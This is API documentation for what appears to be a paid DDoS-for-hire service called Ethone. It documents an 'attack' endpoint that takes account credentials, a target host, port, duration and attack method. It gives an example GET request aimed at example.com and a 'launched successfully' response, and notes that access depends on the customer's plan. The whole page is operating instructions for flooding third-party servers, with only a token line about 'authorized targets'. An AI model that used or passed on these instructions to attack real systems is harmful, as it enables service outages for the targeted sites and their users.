Ethone API

P O W E R F U L, ‎ S E C U R E, ‎ R E L I A B L E

API Documentation

Attack Endpoint

http://api.ethone.net:777/api/attack?username=&password=&target=&port=&time=&method=
This endpoint allows you to initiate a DDoS attack using your Ethone account credentials. You must have a valid account with API access privileges to use this endpoint.

Parameters

Parameter Type Required Description
username String Required Your Ethone account username. Must be a valid registered user.
password String Required Your Ethone account password.
target String Required The target IP address or domain name for the attack.
port Integer Required The target port for the attack.
time Integer Required Duration of the attack in seconds. Maximum duration depends on your plan.
method String Required The attack method to use. Available methods depend on your plan.

Example Request

http://api.ethone.net:777/api/attack?username=ethoneuser&password=mypassword123&target=example.com&port=80&time=60&method=TCP

Example Response

{
  "status": "success",
  "message": "Attack launched successfully",
  "attack_id": "atk_5f8d3a1b2c3e4"
}
Important Notes
  • You must use the GET method to access this endpoint
  • All parameters must be properly URL-encoded
  • API access is available only with the Extreme Plan
  • Make sure your account has sufficient concurrent slots available
  • Respect the Terms of Service and only attack authorized targets